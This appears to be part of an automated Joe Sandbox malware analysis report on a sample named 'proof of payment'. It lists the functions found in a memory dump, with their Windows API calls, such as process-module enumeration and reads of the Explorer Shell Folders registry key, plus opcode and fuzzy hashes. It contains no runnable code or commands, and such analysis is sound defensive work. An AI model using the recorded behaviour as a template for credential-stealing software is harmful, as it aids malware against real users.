                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmpmemset
                                      • String ID:
                                      • API String ID: 1065087418-0
                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                      • String ID:
                                      • API String ID: 1481295809-0
                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
                                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$PointerRead
                                      • String ID:
                                      • API String ID: 3154509469-0
                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                      • String ID:
                                      • API String ID: 4232544981-0
                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$FileModuleName
                                      • String ID:
                                      • API String ID: 3859505661-0
                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004095FC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                      • String ID:
                                      • API String ID: 3655998216-0
                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                      Uniqueness

